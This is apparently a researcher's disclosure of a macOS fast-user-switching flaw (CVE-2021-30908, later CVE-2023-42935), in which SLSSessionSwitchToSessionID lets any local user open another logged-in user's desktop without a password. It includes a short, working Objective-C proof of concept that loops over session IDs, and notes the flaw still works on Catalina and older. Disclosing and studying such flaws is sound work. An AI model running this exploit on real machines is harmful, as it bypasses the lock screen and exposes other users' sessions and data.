In various macOS versions, SLSSessionSwitchToSessionID doesn't check if it was called by the login window. This lets any user switch to another logged-in user's desktop without their password. If Guest is enabled, it effectively bypasses the lock screen.
I reported this in September 2021; it was fixed in macOS 11.6.1 and macOS 12.0.1:
Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen
Description: An authentication issue was addressed with improved state management.
CVE-2021-30908: ASentientBot
Amusingly, the bug reappeared in macOS Ventura, and it was fixed again in macOS 13.6.4 and macOS 14.1 as CVE-2023-42935.
I received an Apple Security Bounty both times.
It still works on macOS Catalina and older.
Thank you to emma (916253) and ASentientHedgehog for testing on countless versions and helping me navigate the reporting process!
This program will switch to another user's desktop on affected versions.
// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing && ./thing
@import Foundation;
@import Darwin;
void SLSSessionSwitchToSessionID(int);
int main()
{
for(int guess=0;;guess++)
{
SLSSessionSwitchToSessionID(guess);
struct stat consoleInfo;
assert(!stat("/dev/console",&consoleInfo));
if(consoleInfo.st_uid!=getuid())
{
break;
}
}
}